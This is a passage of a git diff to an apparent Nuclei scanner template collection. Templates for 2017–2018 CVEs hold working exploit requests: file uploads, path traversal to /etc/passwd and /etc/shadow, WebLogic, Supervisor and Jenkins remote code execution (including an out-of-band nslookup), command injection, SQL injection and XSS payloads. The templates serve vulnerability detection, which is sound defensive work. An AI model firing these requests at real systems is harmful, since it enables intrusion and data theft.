- Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137 - - -----------------------------154934846911423734231554128137 - Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php" - Content-Type: application/x-php - - - - -----------------------------154934846911423734231554128137-- - - - | # REQUEST 2 - GET /logos_clients/1.php HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "48dbd2384cb6b996fa1e2855c7f0567f" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/06 diff --git a/nuclei-templates/CVE-2017/CVE-2017-7615.yaml b/nuclei-templates/CVE-2017/CVE-2017-7615.yaml deleted file mode 100644 index 33787cf3bd..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-7615.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2017-7615 - -info: - name: CVE-2017-7615 - author: bp0lr,dwisiswant0 - severity: high - description: MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php. - tags: cve,cve2017,mantisbt - - # THIS TEMPLATE IS ONLY FOR DETECTING - # To carry out further attacks, please see reference[2] below. - # This template works by guessing user ID. - # MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded on reference[1]. - reference: - - https://sourceforge.net/projects/mantisbt/files/mantis-stable/ - - http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt - - https://www.exploit-db.com/exploits/41890 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 - cve-id: CVE-2017-7615 - cwe-id: CWE-640 - -requests: - - method: GET - path: - - "{{BaseURL}}/verify.php?id=1&confirm_hash=" - - "{{BaseURL}}/mantis/verify.php?id=1&confirm_hash=" - - "{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash=" - - "{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash=" - - "{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - " - - - | - GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/html - - - - - | - GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/html - - - - - | - GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/html - - - - - | - GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/html - - - - - | - GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/html - - - - matchers-condition: and - matchers: - - type: word - words: - - "6dd70f16549456495373a337e6708865" - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2017/cve-2017-1000028.yaml b/nuclei-templates/CVE-2017/cve-2017-1000028.yaml new file mode 100644 index 0000000000..c91556d3c0 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-1000028.yaml @@ -0,0 +1,41 @@ +id: CVE-2017-1000028 + +info: + name: GlassFish LFI + author: pikpikcu,daffainfo + severity: high + description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request. + reference: + - https://www.exploit-db.com/exploits/45196 + - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822 + - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 + - https://www.exploit-db.com/exploits/45196/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-1000028 + cwe-id: CWE-22 + tags: cve,cve2017,oracle,glassfish,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" + - "{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: dsl + dsl: + - "regex('root:.*:0:0:', body)" + - "status_code == 200" + condition: and + + - type: dsl + dsl: + - "contains(body, 'bit app support')" + - "contains(body, 'fonts')" + - "contains(body, 'extensions')" + - "status_code == 200" + condition: and diff --git a/nuclei-templates/CVE-2017/cve-2017-10271.yaml b/nuclei-templates/CVE-2017/cve-2017-10271.yaml new file mode 100644 index 0000000000..0417e66eeb --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-10271.yaml @@ -0,0 +1,96 @@ +id: CVE-2017-10271 + +info: + name: Oracle WebLogic Server - Remote Command Execution + author: dr_set,ImNightmaree + severity: high + description: | + Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. + reference: + - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271 + - https://github.com/SuperHacker-liuan/cve-2017-10271-poc + - http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html + - http://www.securitytracker.com/id/1039608 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + cve-id: CVE-2017-10271 + tags: cve,cve2017,rce,oracle,weblogic,oast + +requests: + - raw: + - | + POST /wls-wsat/CoordinatorPortType HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Language: en + Content-Type: text/xml + + + + + + + + + + /bin/bash + + + -c + + + example.com + + + + + + + + + + - | + POST /wls-wsat/CoordinatorPortType HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Language: en + Content-Type: text/xml + + + + + + + + + + + + + {{randstr}} + + + + + + + + + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + regex: + - ".*" + - "{{randstr}}" + condition: or + + - type: status + status: + - 500 + - 200 + condition: or \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-11610.yaml b/nuclei-templates/CVE-2017/cve-2017-11610.yaml new file mode 100644 index 0000000000..c0cead3284 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-11610.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-11610 + +info: + name: Supervisor XMLRPC Exec + author: notnotnotveg + severity: high + description: The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisord namespace lookups. + reference: + - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md + - https://nvd.nist.gov/vuln/detail/CVE-2017-11610 + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXGWOJNSWWK2TTWQJZJUP66FLFIWDMBQ/ + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DTPDZV4ZRICDYAYZVUHSYZAYDLRMG2IM/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2017-11610 + cwe-id: CWE-276 + metadata: + shodan-query: http.title:"Supervisor Status" + tags: cve,cve2017,rce,supervisor,oast,xmlrpc + +requests: + - raw: + - | + POST /RPC2 HTTP/1.1 + Host: {{Hostname}} + Accept: text/xml + Content-type: text/xml + + + supervisor.supervisord.options.warnings.linecache.os.system + + + nslookup {{interactsh-url}} + + + + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: header + words: + - "text/xml" + + - type: word + part: body + words: + - "" + - "" + condition: and diff --git a/nuclei-templates/CVE-2017/cve-2017-12794.yaml b/nuclei-templates/CVE-2017/cve-2017-12794.yaml new file mode 100644 index 0000000000..02b2f66ae2 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-12794.yaml @@ -0,0 +1,42 @@ +id: CVE-2017-12794 + +info: + name: Django Debug Page - Cross-Site Scripting + author: pikpikcu + severity: medium + description: | + Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with "DEBUG = True" is not on by default (which is what makes the page visible). + reference: + - https://twitter.com/sec715/status/1406779605055270914 + - https://nvd.nist.gov/vuln/detail/CVE-2017-12794 + - https://www.djangoproject.com/weblog/2017/sep/05/security-releases/ + - http://www.securitytracker.com/id/1039264 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-12794 + cwe-id: CWE-79 + tags: xss,django,cve,cve2017 + +requests: + - method: GET + path: + - "{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header + +# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2017/cve-2017-14535.yaml b/nuclei-templates/CVE-2017/cve-2017-14535.yaml new file mode 100644 index 0000000000..b116743885 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-14535.yaml @@ -0,0 +1,42 @@ +id: CVE-2017-14535 + +info: + name: Trixbox - 2.8.0.4 OS Command Injection + author: pikpikcu + severity: high + description: Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php. + reference: + - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ + - https://www.exploit-db.com/exploits/49913 + - https://nvd.nist.gov/vuln/detail/CVE-2017-14535 + - https://www.linkedin.com/pulse/trixbox-os-command-injection-vulnerability-sachin-wagh-ceh-ecsa-/?published=t + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2017-14535 + cwe-id: CWE-78 + tags: cve,cve2017,trixbox,rce,injection + +requests: + - raw: + - | + GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: de,en-US;q=0.7,en;q=0.3 + Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= + Connection: close + Cache-Control: max-age=0 + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/01 diff --git a/nuclei-templates/CVE-2017/cve-2017-15287.yaml b/nuclei-templates/CVE-2017/cve-2017-15287.yaml new file mode 100644 index 0000000000..144181dec3 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-15287.yaml @@ -0,0 +1,32 @@ +id: CVE-2017-15287 + +info: + name: Dreambox WebControl 2.0.0 - Cross-Site Scripting + author: pikpikcu + severity: medium + description: | + Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI. + reference: + - https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf + - https://www.exploit-db.com/exploits/42986/ + - https://nvd.nist.gov/vuln/detail/CVE-2017-15287 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-15287 + cwe-id: CWE-79 + tags: cve,cve2017,xss,dreambox + +requests: + - raw: + - | + GET /webadmin/pkg?command= HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers: + - type: word + words: + - 'Unknown command: ' + +# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2017/cve-2017-15647.yaml b/nuclei-templates/CVE-2017/cve-2017-15647.yaml new file mode 100644 index 0000000000..eb06edfa05 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-15647.yaml @@ -0,0 +1,33 @@ +id: CVE-2017-15647 + +info: + name: FiberHome - Directory Traversal + author: daffainfo + severity: high + description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. + reference: + - https://www.exploit-db.com/exploits/44054 + - https://www.cvedetails.com/cve/CVE-2017-15647 + - https://blogs.securiteam.com/index.php/archives/3472 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-15647 + cwe-id: CWE-22 + tags: cve,cve2017,lfi,router + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2017/cve-2017-17451.yaml b/nuclei-templates/CVE-2017/cve-2017-17451.yaml new file mode 100644 index 0000000000..69e1e0c84d --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-17451.yaml @@ -0,0 +1,39 @@ +id: CVE-2017-17451 + +info: + name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-17451 + - https://wordpress.org/plugins/wp-mailster/#developers + - https://packetstormsecurity.com/files/145222/WordPress-WP-Mailster-1.5.4.0-Cross-Site-Scripting.html + - https://wpvulndb.com/vulnerabilities/8973 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-17451 + cwe-id: CWE-79 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2017/CVE-2017-18536.yaml b/nuclei-templates/CVE-2017/cve-2017-18536.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-18536.yaml rename to nuclei-templates/CVE-2017/cve-2017-18536.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-4011.yaml b/nuclei-templates/CVE-2017/cve-2017-4011.yaml new file mode 100644 index 0000000000..77cda0cb40 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-4011.yaml @@ -0,0 +1,36 @@ +id: CVE-2017-4011 + +info: + name: McAfee NDLP User-Agent XSS + author: geeknik + severity: medium + description: McAfee Network Data Loss Prevention (NDLP) 9.3.x allows remote attackers to get session/cookie information via modification of the HTTP request. + reference: + - https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab + - https://kc.mcafee.com/corporate/index?page=content&id=SB10198 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-4011 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-4011 + cwe-id: CWE-79 + tags: cve,cve2017,mcafee,xss + +requests: + - method: GET + path: + - "{{BaseURL}}" + headers: + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);// + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//" + + - type: word + part: header + words: + - "text/html" diff --git a/nuclei-templates/CVE-2017/CVE-2017-5487.yaml b/nuclei-templates/CVE-2017/cve-2017-5487.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-5487.yaml rename to nuclei-templates/CVE-2017/cve-2017-5487.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-6090.yaml b/nuclei-templates/CVE-2017/cve-2017-6090.yaml new file mode 100644 index 0000000000..0a448dae64 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-6090.yaml @@ -0,0 +1,49 @@ +id: CVE-2017-6090 + +info: + name: PhpColl 2.5.1 Arbitrary File Upload + author: pikpikcu + severity: high + description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php. + reference: + - https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/ + - https://nvd.nist.gov/vuln/detail/CVE-2017-6090 + - https://www.exploit-db.com/exploits/42934/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2017-6090 + cwe-id: CWE-434 + tags: cve,cve2017,phpcollab,rce,fileupload + +requests: + - raw: + - | # REQUEST 1 + POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137 + + -----------------------------154934846911423734231554128137 + Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php" + Content-Type: application/x-php + + + + -----------------------------154934846911423734231554128137-- + + - | # REQUEST 2 + GET /logos_clients/1.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "48dbd2384cb6b996fa1e2855c7f0567f" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/06 diff --git a/nuclei-templates/CVE-2017/cve-2017-7615.yaml b/nuclei-templates/CVE-2017/cve-2017-7615.yaml new file mode 100644 index 0000000000..2c4e7785e0 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-7615.yaml @@ -0,0 +1,44 @@ +id: CVE-2017-7615 + +# THIS TEMPLATE IS ONLY FOR DETECTING +# To carry out further attacks, please see reference[2] below. +# This template works by guessing user ID. +# MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded on reference[1]. + +info: + name: MantisBT <=2.30 - Arbitrary Password Reset and Unauthenticated Admin Access + author: bp0lr,dwisiswant0 + severity: high + description: MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php. + reference: + - https://sourceforge.net/projects/mantisbt/files/mantis-stable/ + - http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt + - https://www.exploit-db.com/exploits/41890 + - http://www.openwall.com/lists/oss-security/2017/04/16/2 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2017-7615 + cwe-id: CWE-640 + tags: cve,cve2017,mantisbt + +requests: + - method: GET + path: + - "{{BaseURL}}/verify.php?id=1&confirm_hash=" + - "{{BaseURL}}/mantis/verify.php?id=1&confirm_hash=" + - "{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash=" + - "{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash=" + - "{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - " + + - | + GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/html + + + + - | + GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/html + + + + - | + GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/html + + + + - | + GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/html + + + + - | + GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/html + + + + matchers-condition: and + matchers: + - type: word + words: + - "6dd70f16549456495373a337e6708865" + part: body + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2018/CVE-2018-1000856.yaml b/nuclei-templates/CVE-2018/CVE-2018-1000856.yaml deleted file mode 100644 index 836d88b898..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-1000856.yaml +++ /dev/null @@ -1,52 +0,0 @@ -id: CVE-2018-1000856 -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via segments/add.php Segment Name field. - reference: - - https://github.com/domainmod/domainmod/issues/80 - - https://nvd.nist.gov/vuln/detail/CVE-2018-1000856 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-1000856 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2018,domainmod,xss,authenticated -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - POST /segments/add.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test - - | - GET /segments/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - cookie-reuse: true - redirects: true - max-redirects: 3 - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-1000861.yaml b/nuclei-templates/CVE-2018/CVE-2018-1000861.yaml deleted file mode 100644 index d19af14c58..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-1000861.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2018-1000861 - -info: - name: Jenkins - Remote Command Injection - author: dhiyaneshDK,pikpikcu - severity: critical - description: Jenkins 2.153 and earlier and LTS 2.138.3 and earlier are susceptible to a remote command injection via stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way. - reference: - - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 - - https://nvd.nist.gov/vuln/detail/CVE-2018-1000861 - - https://jenkins.io/security/advisory/2018-12-05/#SECURITY-595 - - http://web.archive.org/web/20210421212616/https://www.securityfocus.com/bid/106176 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-1000861 - cwe-id: CWE-502 - tags: kev,vulhub,cve,cve2018,rce,jenkins - -requests: - - method: GET - path: - - '{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;' - - matchers-condition: and - matchers: - - - type: word - words: - - "package#vulntest" - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2018/cve-2018-10201.yaml b/nuclei-templates/CVE-2018/CVE-2018-10201.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-10201.yaml rename to nuclei-templates/CVE-2018/CVE-2018-10201.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-10230.yaml b/nuclei-templates/CVE-2018/CVE-2018-10230.yaml new file mode 100644 index 0000000000..281d1a1d81 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-10230.yaml @@ -0,0 +1,36 @@ +id: CVE-2018-10230 +info: + name: Zend Server < 9.13 - XSS + author: marcos_iaf + severity: medium + description: | + A vulnerability in ZendServer < 9.13 allows an attacker to perform Reflected XSS via the debug_host parameter. + reference: + - https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf + - https://nvd.nist.gov/vuln/detail/CVE-2018-10230 + - https://www.zend.com/en/products/server/release-notes + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-10230 + cwe-id: CWE-79 + tags: cve,cve2018,xss,zend +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "is not allowed to open debug sessions" + condition: and + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-10818.yaml b/nuclei-templates/CVE-2018/CVE-2018-10818.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-10818.yaml rename to nuclei-templates/CVE-2018/CVE-2018-10818.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-10823.yaml b/nuclei-templates/CVE-2018/CVE-2018-10823.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-10823.yaml rename to nuclei-templates/CVE-2018/CVE-2018-10823.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-10956.yaml b/nuclei-templates/CVE-2018/CVE-2018-10956.yaml deleted file mode 100644 index 89b1bbae56..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-10956.yaml +++ /dev/null @@ -1,32 +0,0 @@ - -id: CVE-2018-10956 -info: - name: IPConfigure Orchid Core VMS 2.0.5 - Unauthenticated Directory Traversal. - author: 0x_Akoko - severity: high - description: IPConfigure Orchid Core VMS 2.0.5 allows Directory Traversal. - reference: - - https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/ - - https://www.cvedetails.com/cve/CVE-2018-10956 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H - cvss-score: 7.5 - cve-id: CVE-2018-10956 - cwe-id: CWE-22 - tags: cve,cve2018,Orchid,vms,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/shadow" - matchers-condition: and - matchers: - - type: word - words: - - "root:*:" - - "bin:*:" - condition: and - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-11231.yaml b/nuclei-templates/CVE-2018/CVE-2018-11231.yaml new file mode 100644 index 0000000000..9412a5f837 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-11231.yaml @@ -0,0 +1,38 @@ +id: CVE-2018-11231 +info: + name: Opencart Divido - Sql Injection + author: ritikchaddha + severity: high + description: | + OpenCart Divido plugin is susceptible to SQL injection + reference: + - http://foreversong.cn/archives/1183 + - https://nvd.nist.gov/vuln/detail/CVE-2018-11231 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2018-11231 + cwe-id: CWE-89 + tags: cve,cve2018,opencart,sqli +variables: + num: "999999999" +requests: + - raw: + - | + POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1 + Host: {{Hostname}} + + {"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)"},"status":2} + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/19 diff --git a/nuclei-templates/CVE-2018/cve-2018-11510.yaml b/nuclei-templates/CVE-2018/CVE-2018-11510.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-11510.yaml rename to nuclei-templates/CVE-2018/CVE-2018-11510.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-11709.yaml b/nuclei-templates/CVE-2018/CVE-2018-11709.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-11709.yaml rename to nuclei-templates/CVE-2018/CVE-2018-11709.yaml diff --git 